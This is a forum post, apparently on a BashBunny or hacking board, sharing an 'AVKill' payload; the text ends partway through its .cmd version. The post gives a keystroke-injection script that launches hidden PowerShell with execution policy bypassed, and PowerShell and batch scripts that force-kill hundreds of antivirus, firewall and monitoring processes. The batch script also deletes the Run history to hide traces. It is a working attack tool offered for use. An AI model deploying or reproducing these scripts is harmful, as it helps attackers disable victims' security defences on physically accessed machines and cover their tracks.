Found 38 results

  1. [PAYLOAD] AVKill

    Eh, I haven't been too active in awhile due to work so I figured I'd post one from my collection. AVKill - BashBunny -Ar1k88 This script was based off the Metasploit ruby code of "avkill". I just rewrote it for BashBunny. Payload.txt #!/bin/bash # # Title: AVKill # Author: Ar1k88 # Version: 1.2.1 # Target: Windows 7-10 # # O===================O=================== # | Magenta | Setup # | Yellow | Excuting Script # | Green/Success | Script Completed # | Cyan | Cleaning Up/ # | | | Shutting down # | OFF | Ready for Removal # O======================================= # # This is based off of avkill.rb from metasploit framework, I managed to just take the processes out, # and convert them to both .cmd format AND .ps1 format. So pick your poison guys. Have fun! # -Ar1k88 # Setup BashBunny LED M SOLID source bunny_helpers.sh Q DELAY 5000 # Set BashBunny and Execute AVKill ATTACKMODE HID STORAGE LED Y VERYFAST Q GUI r Q DELAY 1000 Q STRING powershell -executionpolicy bypass -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\start.cmd')" Q ENTER LED SUCCESS Q DELAY 30000 # Starting syncing and shutdown sync -o LED C VERYFAST Q DELAY 3000 # Shutdown Command for BashBunny LED C SOLID shutdown 0 AVKill.ps1 Stop-Process -ProcessName AAWTray.exe -Force Stop-Process -ProcessName Ad-Aware.exe -Force Stop-Process -ProcessName MSASCui.exe -Force Stop-Process -ProcessName _avp32.exe -Force Stop-Process -ProcessName _avpcc.exe -Force Stop-Process -ProcessName _avpm.exe -Force Stop-Process -ProcessName aAvgApi.exe -Force Stop-Process -ProcessName ackwin32.exe -Force Stop-Process -ProcessName adaware.exe -Force Stop-Process -ProcessName advxdwin.exe -Force Stop-Process -ProcessName agentsvr.exe -Force Stop-Process -ProcessName agentw.exe -Force Stop-Process -ProcessName alertsvc.exe -Force Stop-Process -ProcessName alevir.exe -Force Stop-Process -ProcessName alogserv.exe -Force Stop-Process -ProcessName amon9x.exe -Force Stop-Process 
-ProcessName anti-trojan.exe -Force Stop-Process -ProcessName antivirus.exe -Force Stop-Process -ProcessName ants.exe -Force Stop-Process -ProcessName apimonitor.exe -Force Stop-Process -ProcessName aplica32.exe -Force Stop-Process -ProcessName apvxdwin.exe -Force Stop-Process -ProcessName arr.exe -Force Stop-Process -ProcessName atcon.exe -Force Stop-Process -ProcessName atguard.exe -Force Stop-Process -ProcessName atro55en.exe -Force Stop-Process -ProcessName atupdater.exe -Force Stop-Process -ProcessName atwatch.exe -Force Stop-Process -ProcessName au.exe -Force Stop-Process -ProcessName aupdate.exe -Force Stop-Process -ProcessName auto-protect.nav80try.exe -Force Stop-Process -ProcessName autodown.exe -Force Stop-Process -ProcessName autotrace.exe -Force Stop-Process -ProcessName autoupdate.exe -Force Stop-Process -ProcessName avconsol.exe -Force Stop-Process -ProcessName ave32.exe -Force Stop-Process -ProcessName avgcc32.exe -Force Stop-Process -ProcessName avgctrl.exe -Force Stop-Process -ProcessName avgemc.exe -Force Stop-Process -ProcessName avgnt.exe -Force Stop-Process -ProcessName avgrsx.exe -Force Stop-Process -ProcessName avgserv.exe -Force Stop-Process -ProcessName avgserv9.exe -Force Stop-Process -ProcessName avguard.exe -Force Stop-Process -ProcessName avgw.exe -Force Stop-Process -ProcessName avkpop.exe -Force Stop-Process -ProcessName avkserv.exe -Force Stop-Process -ProcessName avkservice.exe -Force Stop-Process -ProcessName avkwctl9.exe -Force Stop-Process -ProcessName avltmain.exe -Force Stop-Process -ProcessName avnt.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp32.exe -Force Stop-Process -ProcessName avpcc.exe -Force Stop-Process -ProcessName avpdos32.exe -Force Stop-Process -ProcessName avpm.exe -Force Stop-Process -ProcessName avptc32.exe -Force Stop-Process -ProcessName avpupd.exe -Force Stop-Process -ProcessName avsched32.exe -Force Stop-Process -ProcessName 
avsynmgr.exe -Force Stop-Process -ProcessName avwin.exe -Force Stop-Process -ProcessName avwin95.exe -Force Stop-Process -ProcessName avwinnt.exe -Force Stop-Process -ProcessName avwupd.exe -Force Stop-Process -ProcessName avwupd32.exe -Force Stop-Process -ProcessName avwupsrv.exe -Force Stop-Process -ProcessName avxmonitor9x.exe -Force Stop-Process -ProcessName avxmonitornt.exe -Force Stop-Process -ProcessName avxquar.exe -Force Stop-Process -ProcessName backweb.exe -Force Stop-Process -ProcessName bargains.exe -Force Stop-Process -ProcessName bd_professional.exe -Force Stop-Process -ProcessName beagle.exe -Force Stop-Process -ProcessName belt.exe -Force Stop-Process -ProcessName bidef.exe -Force Stop-Process -ProcessName bidserver.exe -Force Stop-Process -ProcessName bipcp.exe -Force Stop-Process -ProcessName bipcpevalsetup.exe -Force Stop-Process -ProcessName bisp.exe -Force Stop-Process -ProcessName blackd.exe -Force Stop-Process -ProcessName blackice.exe -Force Stop-Process -ProcessName blink.exe -Force Stop-Process -ProcessName blss.exe -Force Stop-Process -ProcessName bootconf.exe -Force Stop-Process -ProcessName bootwarn.exe -Force Stop-Process -ProcessName borg2.exe -Force Stop-Process -ProcessName bpc.exe -Force Stop-Process -ProcessName brasil.exe -Force Stop-Process -ProcessName bs120.exe -Force Stop-Process -ProcessName bundle.exe -Force Stop-Process -ProcessName bvt.exe -Force Stop-Process -ProcessName ccapp.exe -Force Stop-Process -ProcessName ccevtmgr.exe -Force Stop-Process -ProcessName ccpxysvc.exe -Force Stop-Process -ProcessName cdp.exe -Force Stop-Process -ProcessName cfd.exe -Force Stop-Process -ProcessName cfgwiz.exe -Force Stop-Process -ProcessName cfiadmin.exe -Force Stop-Process -ProcessName cfiaudit.exe -Force Stop-Process -ProcessName cfinet.exe -Force Stop-Process -ProcessName cfinet32.exe -Force Stop-Process -ProcessName claw95.exe -Force Stop-Process -ProcessName claw95cf.exe -Force Stop-Process -ProcessName clean.exe -Force 
Stop-Process -ProcessName cleaner.exe -Force Stop-Process -ProcessName cleaner3.exe -Force Stop-Process -ProcessName cleanpc.exe -Force Stop-Process -ProcessName click.exe -Force Stop-Process -ProcessName cmd.exe -Force Stop-Process -ProcessName cmd32.exe -Force Stop-Process -ProcessName cmesys.exe -Force Stop-Process -ProcessName cmgrdian.exe -Force Stop-Process -ProcessName cmon016.exe -Force Stop-Process -ProcessName connectionmonitor.exe -Force Stop-Process -ProcessName cpd.exe -Force Stop-Process -ProcessName cpf9x206.exe -Force Stop-Process -ProcessName cpfnt206.exe -Force Stop-Process -ProcessName ctrl.exe -Force Stop-Process -ProcessName cv.exe -Force Stop-Process -ProcessName cwnb181.exe -Force Stop-Process -ProcessName cwntdwmo.exe -Force Stop-Process -ProcessName datemanager.exe -Force Stop-Process -ProcessName dcomx.exe -Force Stop-Process -ProcessName defalert.exe -Force Stop-Process -ProcessName defscangui.exe -Force Stop-Process -ProcessName defwatch.exe -Force Stop-Process -ProcessName deputy.exe -Force Stop-Process -ProcessName divx.exe -Force Stop-Process -ProcessName dllcache.exe -Force Stop-Process -ProcessName dllreg.exe -Force Stop-Process -ProcessName doors.exe -Force Stop-Process -ProcessName dpf.exe -Force Stop-Process -ProcessName dpfsetup.exe -Force Stop-Process -ProcessName dpps2.exe -Force Stop-Process -ProcessName drwatson.exe -Force Stop-Process -ProcessName drweb32.exe -Force Stop-Process -ProcessName drwebupw.exe -Force Stop-Process -ProcessName dssagent.exe -Force Stop-Process -ProcessName dvp95.exe -Force Stop-Process -ProcessName dvp95_0.exe -Force Stop-Process -ProcessName ecengine.exe -Force Stop-Process -ProcessName efpeadm.exe -Force Stop-Process -ProcessName emsw.exe -Force Stop-Process -ProcessName ent.exe -Force Stop-Process -ProcessName esafe.exe -Force Stop-Process -ProcessName escanhnt.exe -Force Stop-Process -ProcessName escanv95.exe -Force Stop-Process -ProcessName espwatch.exe -Force Stop-Process -ProcessName 
ethereal.exe -Force Stop-Process -ProcessName etrustcipe.exe -Force Stop-Process -ProcessName evpn.exe -Force Stop-Process -ProcessName exantivirus-cnet.exe -Force Stop-Process -ProcessName exe.avxw.exe -Force Stop-Process -ProcessName expert.exe -Force Stop-Process -ProcessName explore.exe -Force Stop-Process -ProcessName f-agnt95.exe -Force Stop-Process -ProcessName f-prot.exe -Force Stop-Process -ProcessName f-prot95.exe -Force Stop-Process -ProcessName f-stopw.exe -Force Stop-Process -ProcessName fameh32.exe -Force Stop-Process -ProcessName fast.exe -Force Stop-Process -ProcessName fch32.exe -Force Stop-Process -ProcessName fih32.exe -Force Stop-Process -ProcessName findviru.exe -Force Stop-Process -ProcessName firewall.exe -Force Stop-Process -ProcessName fnrb32.exe -Force Stop-Process -ProcessName fp-win.exe -Force Stop-Process -ProcessName fp-win_trial.exe -Force Stop-Process -ProcessName fprot.exe -Force Stop-Process -ProcessName frw.exe -Force Stop-Process -ProcessName fsaa.exe -Force Stop-Process -ProcessName fsav.exe -Force Stop-Process -ProcessName fsav32.exe -Force Stop-Process -ProcessName fsav530stbyb.exe -Force Stop-Process -ProcessName fsav530wtbyb.exe -Force Stop-Process -ProcessName fsav95.exe -Force Stop-Process -ProcessName fsgk32.exe -Force Stop-Process -ProcessName fsm32.exe -Force Stop-Process -ProcessName fsma32.exe -Force Stop-Process -ProcessName fsmb32.exe -Force Stop-Process -ProcessName gator.exe -Force Stop-Process -ProcessName gbmenu.exe -Force Stop-Process -ProcessName gbpoll.exe -Force Stop-Process -ProcessName generics.exe -Force Stop-Process -ProcessName gmt.exe -Force Stop-Process -ProcessName guard.exe -Force Stop-Process -ProcessName guarddog.exe -Force Stop-Process -ProcessName hacktracersetup.exe -Force Stop-Process -ProcessName hbinst.exe -Force Stop-Process -ProcessName hbsrv.exe -Force Stop-Process -ProcessName hotactio.exe -Force Stop-Process -ProcessName hotpatch.exe -Force Stop-Process -ProcessName htlog.exe -Force 
Stop-Process -ProcessName htpatch.exe -Force Stop-Process -ProcessName hwpe.exe -Force Stop-Process -ProcessName hxdl.exe -Force Stop-Process -ProcessName hxiul.exe -Force Stop-Process -ProcessName iamapp.exe -Force Stop-Process -ProcessName iamserv.exe -Force Stop-Process -ProcessName iamstats.exe -Force Stop-Process -ProcessName ibmasn.exe -Force Stop-Process -ProcessName ibmavsp.exe -Force Stop-Process -ProcessName icload95.exe -Force Stop-Process -ProcessName icloadnt.exe -Force Stop-Process -ProcessName icmon.exe -Force Stop-Process -ProcessName icsupp95.exe -Force Stop-Process -ProcessName icsuppnt.exe -Force Stop-Process -ProcessName idle.exe -Force Stop-Process -ProcessName iedll.exe -Force Stop-Process -ProcessName iedriver.exe -Force Stop-Process -ProcessName iexplorer.exe -Force Stop-Process -ProcessName iface.exe -Force Stop-Process -ProcessName ifw2000.exe -Force Stop-Process -ProcessName inetlnfo.exe -Force Stop-Process -ProcessName infus.exe -Force Stop-Process -ProcessName infwin.exe -Force Stop-Process -ProcessName init.exe -Force Stop-Process -ProcessName intdel.exe -Force Stop-Process -ProcessName intren.exe -Force Stop-Process -ProcessName iomon98.exe -Force Stop-Process -ProcessName istsvc.exe -Force Stop-Process -ProcessName jammer.exe -Force Stop-Process -ProcessName jdbgmrg.exe -Force Stop-Process -ProcessName jedi.exe -Force Stop-Process -ProcessName kavlite40eng.exe -Force Stop-Process -ProcessName kavpers40eng.exe -Force Stop-Process -ProcessName kavpf.exe -Force Stop-Process -ProcessName kazza.exe -Force Stop-Process -ProcessName keenvalue.exe -Force Stop-Process -ProcessName kerio-pf-213-en-win.exe -Force Stop-Process -ProcessName kerio-wrl-421-en-win.exe -Force Stop-Process -ProcessName kerio-wrp-421-en-win.exe -Force Stop-Process -ProcessName kernel32.exe -Force Stop-Process -ProcessName killprocesssetup161.exe -Force Stop-Process -ProcessName launcher.exe -Force Stop-Process -ProcessName ldnetmon.exe -Force Stop-Process -ProcessName 
ldpro.exe -Force Stop-Process -ProcessName ldpromenu.exe -Force Stop-Process -ProcessName ldscan.exe -Force Stop-Process -ProcessName lnetinfo.exe -Force Stop-Process -ProcessName loader.exe -Force Stop-Process -ProcessName localnet.exe -Force Stop-Process -ProcessName lockdown.exe -Force Stop-Process -ProcessName lockdown2000.exe -Force Stop-Process -ProcessName lookout.exe -Force Stop-Process -ProcessName lordpe.exe -Force Stop-Process -ProcessName lsetup.exe -Force Stop-Process -ProcessName luall.exe -Force Stop-Process -ProcessName luau.exe -Force Stop-Process -ProcessName lucomserver.exe -Force Stop-Process -ProcessName luinit.exe -Force Stop-Process -ProcessName luspt.exe -Force Stop-Process -ProcessName mapisvc32.exe -Force Stop-Process -ProcessName mcagent.exe -Force Stop-Process -ProcessName mcmnhdlr.exe -Force Stop-Process -ProcessName mcshield.exe -Force Stop-Process -ProcessName mctool.exe -Force Stop-Process -ProcessName mcupdate.exe -Force Stop-Process -ProcessName mcvsrte.exe -Force Stop-Process -ProcessName mcvsshld.exe -Force Stop-Process -ProcessName md.exe -Force Stop-Process -ProcessName mfin32.exe -Force Stop-Process -ProcessName mfw2en.exe -Force Stop-Process -ProcessName mfweng3.02d30.exe -Force Stop-Process -ProcessName mgavrtcl.exe -Force Stop-Process -ProcessName mgavrte.exe -Force Stop-Process -ProcessName mghtml.exe -Force Stop-Process -ProcessName mgui.exe -Force Stop-Process -ProcessName minilog.exe -Force Stop-Process -ProcessName mmod.exe -Force Stop-Process -ProcessName monitor.exe -Force Stop-Process -ProcessName moolive.exe -Force Stop-Process -ProcessName mostat.exe -Force Stop-Process -ProcessName mpfagent.exe -Force Stop-Process -ProcessName mpfservice.exe -Force Stop-Process -ProcessName mpftray.exe -Force Stop-Process -ProcessName mrflux.exe -Force Stop-Process -ProcessName msapp.exe -Force Stop-Process -ProcessName msbb.exe -Force Stop-Process -ProcessName msblast.exe -Force Stop-Process -ProcessName mscache.exe -Force 
Stop-Process -ProcessName msccn32.exe -Force Stop-Process -ProcessName mscman.exe -Force Stop-Process -ProcessName msconfig.exe -Force Stop-Process -ProcessName msdm.exe -Force Stop-Process -ProcessName msdos.exe -Force Stop-Process -ProcessName msiexec16.exe -Force Stop-Process -ProcessName msinfo32.exe -Force Stop-Process -ProcessName mslaugh.exe -Force Stop-Process -ProcessName msmgt.exe -Force Stop-Process -ProcessName msmsgri32.exe -Force Stop-Process -ProcessName mssmmc32.exe -Force Stop-Process -ProcessName mssys.exe -Force Stop-Process -ProcessName msvxd.exe -Force Stop-Process -ProcessName mu0311ad.exe -Force Stop-Process -ProcessName mwatch.exe -Force Stop-Process -ProcessName n32scanw.exe -Force Stop-Process -ProcessName nav.exe -Force Stop-Process -ProcessName navap.navapsvc.exe -Force Stop-Process -ProcessName navapsvc.exe -Force Stop-Process -ProcessName navapw32.exe -Force Stop-Process -ProcessName navdx.exe -Force Stop-Process -ProcessName navlu32.exe -Force Stop-Process -ProcessName navnt.exe -Force Stop-Process -ProcessName navstub.exe -Force Stop-Process -ProcessName navw32.exe -Force Stop-Process -ProcessName navwnt.exe -Force Stop-Process -ProcessName nc2000.exe -Force Stop-Process -ProcessName ncinst4.exe -Force Stop-Process -ProcessName ndd32.exe -Force Stop-Process -ProcessName neomonitor.exe -Force Stop-Process -ProcessName neowatchlog.exe -Force Stop-Process -ProcessName netarmor.exe -Force Stop-Process -ProcessName netd32.exe -Force Stop-Process -ProcessName netinfo.exe -Force Stop-Process -ProcessName netmon.exe -Force Stop-Process -ProcessName netscanpro.exe -Force Stop-Process -ProcessName netspyhunter-1.2.exe -Force Stop-Process -ProcessName netstat.exe -Force Stop-Process -ProcessName netutils.exe -Force Stop-Process -ProcessName nisserv.exe -Force Stop-Process -ProcessName nisum.exe -Force Stop-Process -ProcessName nmain.exe -Force Stop-Process -ProcessName nod32.exe -Force Stop-Process -ProcessName normist.exe -Force Stop-Process 
-ProcessName norton_internet_secu_3.0_407.exe -Force Stop-Process -ProcessName notstart.exe -Force Stop-Process -ProcessName npf40_tw_98_nt_me_2k.exe -Force Stop-Process -ProcessName npfmessenger.exe -Force Stop-Process -ProcessName nprotect.exe -Force Stop-Process -ProcessName npscheck.exe -Force Stop-Process -ProcessName npssvc.exe -Force Stop-Process -ProcessName nsched32.exe -Force Stop-Process -ProcessName nssys32.exe -Force Stop-Process -ProcessName nstask32.exe -Force Stop-Process -ProcessName nsupdate.exe -Force Stop-Process -ProcessName nt.exe -Force Stop-Process -ProcessName ntrtscan.exe -Force Stop-Process -ProcessName ntvdm.exe -Force Stop-Process -ProcessName ntxconfig.exe -Force Stop-Process -ProcessName nui.exe -Force Stop-Process -ProcessName nupgrade.exe -Force Stop-Process -ProcessName nvarch16.exe -Force Stop-Process -ProcessName nvc95.exe -Force Stop-Process -ProcessName nvsvc32.exe -Force Stop-Process -ProcessName nwinst4.exe -Force Stop-Process -ProcessName nwservice.exe -Force Stop-Process -ProcessName nwtool16.exe -Force Stop-Process -ProcessName ollydbg.exe -Force Stop-Process -ProcessName onsrvr.exe -Force Stop-Process -ProcessName optimize.exe -Force Stop-Process -ProcessName ostronet.exe -Force Stop-Process -ProcessName otfix.exe -Force Stop-Process -ProcessName outpost.exe -Force Stop-Process -ProcessName outpostinstall.exe -Force Stop-Process -ProcessName outpostproinstall.exe -Force Stop-Process -ProcessName padmin.exe -Force Stop-Process -ProcessName panixk.exe -Force Stop-Process -ProcessName patch.exe -Force Stop-Process -ProcessName pavcl.exe -Force Stop-Process -ProcessName pavproxy.exe -Force Stop-Process -ProcessName pavsched.exe -Force Stop-Process -ProcessName pavw.exe -Force Stop-Process -ProcessName pccwin98.exe -Force Stop-Process -ProcessName pcfwallicon.exe -Force Stop-Process -ProcessName pcip10117_0.exe -Force Stop-Process -ProcessName pcscan.exe -Force Stop-Process -ProcessName pdsetup.exe -Force Stop-Process 
-ProcessName periscope.exe -Force Stop-Process -ProcessName persfw.exe -Force Stop-Process -ProcessName perswf.exe -Force Stop-Process -ProcessName pf2.exe -Force Stop-Process -ProcessName pfwadmin.exe -Force Stop-Process -ProcessName pgmonitr.exe -Force Stop-Process -ProcessName pingscan.exe -Force Stop-Process -ProcessName platin.exe -Force Stop-Process -ProcessName pop3trap.exe -Force Stop-Process -ProcessName poproxy.exe -Force Stop-Process -ProcessName popscan.exe -Force Stop-Process -ProcessName portdetective.exe -Force Stop-Process -ProcessName portmonitor.exe -Force Stop-Process -ProcessName powerscan.exe -Force Stop-Process -ProcessName ppinupdt.exe -Force Stop-Process -ProcessName pptbc.exe -Force Stop-Process -ProcessName ppvstop.exe -Force Stop-Process -ProcessName prizesurfer.exe -Force Stop-Process -ProcessName prmt.exe -Force Stop-Process -ProcessName prmvr.exe -Force Stop-Process -ProcessName procdump.exe -Force Stop-Process -ProcessName processmonitor.exe -Force Stop-Process -ProcessName procexplorerv1.0.exe -Force Stop-Process -ProcessName programauditor.exe -Force Stop-Process -ProcessName proport.exe -Force Stop-Process -ProcessName protectx.exe -Force Stop-Process -ProcessName pspf.exe -Force Stop-Process -ProcessName purge.exe -Force Stop-Process -ProcessName qconsole.exe -Force Stop-Process -ProcessName qserver.exe -Force Stop-Process -ProcessName rapapp.exe -Force Stop-Process -ProcessName rav7.exe -Force Stop-Process -ProcessName rav7win.exe -Force Stop-Process -ProcessName rav8win32eng.exe -Force Stop-Process -ProcessName ray.exe -Force Stop-Process -ProcessName rb32.exe -Force Stop-Process -ProcessName rcsync.exe -Force Stop-Process -ProcessName realmon.exe -Force Stop-Process -ProcessName reged.exe -Force Stop-Process -ProcessName regedit.exe -Force Stop-Process -ProcessName regedt32.exe -Force Stop-Process -ProcessName rescue.exe -Force Stop-Process -ProcessName rescue32.exe -Force Stop-Process -ProcessName rrguard.exe -Force 
Stop-Process -ProcessName rshell.exe -Force Stop-Process -ProcessName rtvscan.exe -Force Stop-Process -ProcessName rtvscn95.exe -Force Stop-Process -ProcessName rulaunch.exe -Force Stop-Process -ProcessName run32dll.exe -Force Stop-Process -ProcessName rundll.exe -Force Stop-Process -ProcessName rundll16.exe -Force Stop-Process -ProcessName ruxdll32.exe -Force Stop-Process -ProcessName safeweb.exe -Force Stop-Process -ProcessName sahagent.exe -Force Stop-Process -ProcessName save.exe -Force Stop-Process -ProcessName savenow.exe -Force Stop-Process -ProcessName sbserv.exe -Force Stop-Process -ProcessName sc.exe -Force Stop-Process -ProcessName scam32.exe -Force Stop-Process -ProcessName scan32.exe -Force Stop-Process -ProcessName scan95.exe -Force Stop-Process -ProcessName scanpm.exe -Force Stop-Process -ProcessName scrscan.exe -Force Stop-Process -ProcessName serv95.exe -Force Stop-Process -ProcessName setup_flowprotector_us.exe -Force Stop-Process -ProcessName setupvameeval.exe -Force Stop-Process -ProcessName sfc.exe -Force Stop-Process -ProcessName sgssfw32.exe -Force Stop-Process -ProcessName sh.exe -Force Stop-Process -ProcessName shellspyinstall.exe -Force Stop-Process -ProcessName shn.exe -Force Stop-Process -ProcessName showbehind.exe -Force Stop-Process -ProcessName smc.exe -Force Stop-Process -ProcessName sms.exe -Force Stop-Process -ProcessName smss32.exe -Force Stop-Process -ProcessName soap.exe -Force Stop-Process -ProcessName sofi.exe -Force Stop-Process -ProcessName sperm.exe -Force Stop-Process -ProcessName spf.exe -Force Stop-Process -ProcessName sphinx.exe -Force Stop-Process -ProcessName spoler.exe -Force Stop-Process -ProcessName spoolcv.exe -Force Stop-Process -ProcessName spoolsv32.exe -Force Stop-Process -ProcessName spyxx.exe -Force Stop-Process -ProcessName srexe.exe -Force Stop-Process -ProcessName srng.exe -Force Stop-Process -ProcessName ss3edit.exe -Force Stop-Process -ProcessName ssg_4104.exe -Force Stop-Process -ProcessName 
ssgrate.exe -Force Stop-Process -ProcessName st2.exe -Force Stop-Process -ProcessName start.exe -Force Stop-Process -ProcessName stcloader.exe -Force Stop-Process -ProcessName supftrl.exe -Force Stop-Process -ProcessName support.exe -Force Stop-Process -ProcessName supporter5.exe -Force Stop-Process -ProcessName svc.exe -Force Stop-Process -ProcessName svchostc.exe -Force Stop-Process -ProcessName svchosts.exe -Force Stop-Process -ProcessName svshost.exe -Force Stop-Process -ProcessName sweep95.exe -Force Stop-Process -ProcessName sweepnet.sweepsrv.sys.swnetsup.exe -Force Stop-Process -ProcessName symproxysvc.exe -Force Stop-Process -ProcessName symtray.exe -Force Stop-Process -ProcessName sysedit.exe -Force Stop-Process -ProcessName system.exe -Force Stop-Process -ProcessName system32.exe -Force Stop-Process -ProcessName sysupd.exe -Force Stop-Process -ProcessName taskmg.exe -Force Stop-Process -ProcessName taskmgr.exe -Force Stop-Process -ProcessName taskmo.exe -Force Stop-Process -ProcessName taskmon.exe -Force Stop-Process -ProcessName taumon.exe -Force Stop-Process -ProcessName tbscan.exe -Force Stop-Process -ProcessName tc.exe -Force Stop-Process -ProcessName tca.exe -Force Stop-Process -ProcessName tcm.exe -Force Stop-Process -ProcessName tds-3.exe -Force Stop-Process -ProcessName tds2-98.exe -Force Stop-Process -ProcessName tds2-nt.exe -Force Stop-Process -ProcessName teekids.exe -Force Stop-Process -ProcessName tfak.exe -Force Stop-Process -ProcessName tfak5.exe -Force Stop-Process -ProcessName tgbob.exe -Force Stop-Process -ProcessName titanin.exe -Force Stop-Process -ProcessName titaninxp.exe -Force Stop-Process -ProcessName tracert.exe -Force Stop-Process -ProcessName trickler.exe -Force Stop-Process -ProcessName trjscan.exe -Force Stop-Process -ProcessName trjsetup.exe -Force Stop-Process -ProcessName trojantrap3.exe -Force Stop-Process -ProcessName tsadbot.exe -Force Stop-Process -ProcessName tvmd.exe -Force Stop-Process -ProcessName tvtmd.exe -Force 
Stop-Process -ProcessName undoboot.exe -Force Stop-Process -ProcessName updat.exe -Force Stop-Process -ProcessName update.exe -Force Stop-Process -ProcessName upgrad.exe -Force Stop-Process -ProcessName utpost.exe -Force Stop-Process -ProcessName vbcmserv.exe -Force Stop-Process -ProcessName vbcons.exe -Force Stop-Process -ProcessName vbust.exe -Force Stop-Process -ProcessName vbwin9x.exe -Force Stop-Process -ProcessName vbwinntw.exe -Force Stop-Process -ProcessName vcsetup.exe -Force Stop-Process -ProcessName vet32.exe -Force Stop-Process -ProcessName vet95.exe -Force Stop-Process -ProcessName vettray.exe -Force Stop-Process -ProcessName vfsetup.exe -Force Stop-Process -ProcessName vir-help.exe -Force Stop-Process -ProcessName virusmdpersonalfirewall.exe -Force Stop-Process -ProcessName vnlan300.exe -Force Stop-Process -ProcessName vnpc3000.exe -Force Stop-Process -ProcessName vpc32.exe -Force Stop-Process -ProcessName vpc42.exe -Force Stop-Process -ProcessName vpfw30s.exe -Force Stop-Process -ProcessName vptray.exe -Force Stop-Process -ProcessName vscan40.exe -Force Stop-Process -ProcessName vscenu6.02d30.exe -Force Stop-Process -ProcessName vsched.exe -Force Stop-Process -ProcessName vsecomr.exe -Force Stop-Process -ProcessName vshwin32.exe -Force Stop-Process -ProcessName vsisetup.exe -Force Stop-Process -ProcessName vsmain.exe -Force Stop-Process -ProcessName vsmon.exe -Force Stop-Process -ProcessName vsstat.exe -Force Stop-Process -ProcessName vswin9xe.exe -Force Stop-Process -ProcessName vswinntse.exe -Force Stop-Process -ProcessName vswinperse.exe -Force Stop-Process -ProcessName w32dsm89.exe -Force Stop-Process -ProcessName w9x.exe -Force Stop-Process -ProcessName watchdog.exe -Force Stop-Process -ProcessName webdav.exe -Force Stop-Process -ProcessName webscanx.exe -Force Stop-Process -ProcessName webtrap.exe -Force Stop-Process -ProcessName wfindv32.exe -Force Stop-Process -ProcessName whoswatchingme.exe -Force Stop-Process -ProcessName wimmun32.exe 
-Force Stop-Process -ProcessName win-bugsfix.exe -Force Stop-Process -ProcessName win32.exe -Force Stop-Process -ProcessName win32us.exe -Force Stop-Process -ProcessName winactive.exe -Force Stop-Process -ProcessName window.exe -Force Stop-Process -ProcessName windows.exe -Force Stop-Process -ProcessName wininetd.exe -Force Stop-Process -ProcessName wininitx.exe -Force Stop-Process -ProcessName winlogin.exe -Force Stop-Process -ProcessName winmain.exe -Force Stop-Process -ProcessName winnet.exe -Force Stop-Process -ProcessName winppr32.exe -Force Stop-Process -ProcessName winrecon.exe -Force Stop-Process -ProcessName winservn.exe -Force Stop-Process -ProcessName winssk32.exe -Force Stop-Process -ProcessName winstart.exe -Force Stop-Process -ProcessName winstart001.exe -Force Stop-Process -ProcessName wintsk32.exe -Force Stop-Process -ProcessName winupdate.exe -Force Stop-Process -ProcessName wkufind.exe -Force Stop-Process -ProcessName wnad.exe -Force Stop-Process -ProcessName wnt.exe -Force Stop-Process -ProcessName wradmin.exe -Force Stop-Process -ProcessName wrctrl.exe -Force Stop-Process -ProcessName wsbgate.exe -Force Stop-Process -ProcessName wupdater.exe -Force Stop-Process -ProcessName wupdt.exe -Force Stop-Process -ProcessName wyvernworksfirewall.exe -Force Stop-Process -ProcessName xpf202en.exe -Force Stop-Process -ProcessName zapro.exe -Force Stop-Process -ProcessName zapsetup3001.exe -Force Stop-Process -ProcessName zatutor.exe -Force Stop-Process -ProcessName zonalm2601.exe -Force Stop-Process -ProcessName zonealarm.exe -Force OR AVKill.cmd @echo off cls REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f Taskkill /T /F /IM AAWTray.exe /IM Ad-Aware.exe /IM MSASCui.exe /IM _avp32.exe /IM _avpcc.exe /IM _avpm.exe /IM aAvgApi.exe /IM ackwin32.exe /IM adaware.exe /IM advxdwin.exe Taskkill /T /F /IM agentsvr.exe /IM agentw.exe /IM alertsvc.exe /IM alevir.exe /IM alogserv.exe /IM amon9x.exe /IM anti-trojan.exe /IM 
antivirus.exe /IM ants.exe /IM apimonitor.exe Taskkill /T /F /IM aplica32.exe /IM apvxdwin.exe /IM arr.exe /IM atcon.exe /IM atguard.exe /IM atro55en.exe /IM atupdater.exe /IM atwatch.exe /IM au.exe /IM aupdate.exe Taskkill /T /F /IM auto-protect.nav80try.exe /IM autodown.exe /IM autotrace.exe /IM autoupdate.exe /IM avconsol.exe /IM ave32.exe /IM avgcc32.exe /IM avgctrl.exe /IM avgemc.exe Taskkill /T /F /IM avgnt.exe /IM avgrsx.exe /IM avgserv.exe /IM avgserv9.exe /IM avguard.exe /IM avgw.exe /IM avkpop.exe /IM avkserv.exe /IM avkservice.exe /IM avkwctl9.exe Taskkill /T /F /IM avltmain.exe /IM avnt.exe /IM avp.exe /IM avp.exe /IM avp32.exe /IM avpcc.exe /IM avpdos32.exe /IM avpm.exe /IM avptc32.exe /IM avpupd.exe /IM avsched32.exe Taskkill /T /F /IM avsynmgr.exe /IM avwin.exe /IM avwin95.exe /IM avwinnt.exe /IM avwupd.exe /IM avwupd32.exe /IM avwupsrv.exe /IM avxmonitor9x.exe /IM avxmonitornt.exe Taskkill /T /F /IM avxquar.exe /IM backweb.exe /IM bargains.exe /IM bd_professional.exe /IM beagle.exe /IM belt.exe /IM bidef.exe /IM bidserver.exe /IM bipcp.exe /IM bipcpevalsetup.exe Taskkill /T /F /IM bisp.exe /IM blackd.exe /IM blackice.exe /IM blink.exe /IM blss.exe /IM bootconf.exe /IM bootwarn.exe /IM borg2.exe /IM bpc.exe /IM brasil.exe /IM bs120.exe Taskkill /T /F /IM bundle.exe /IM bvt.exe /IM ccapp.exe /IM ccevtmgr.exe /IM ccpxysvc.exe /IM cdp.exe /IM cfd.exe /IM cfgwiz.exe /IM cfiadmin.exe /IM cfiaudit.exe /IM cfinet.exe Taskkill /T /F /IM cfinet32.exe /IM claw95.exe /IM claw95cf.exe /IM clean.exe /IM cleaner.exe /IM cleaner3.exe /IM cleanpc.exe /IM click.exe /IM cmesys.exe Taskkill /T /F /IM cmgrdian.exe /IM cmon016.exe /IM connectionmonitor.exe /IM cpd.exe /IM cpf9x206.exe /IM cpfnt206.exe /IM ctrl.exe /IM cv.exe /IM cwnb181.exe /IM cwntdwmo.exe Taskkill /T /F /IM datemanager.exe /IM dcomx.exe /IM defalert.exe /IM defscangui.exe /IM defwatch.exe /IM deputy.exe 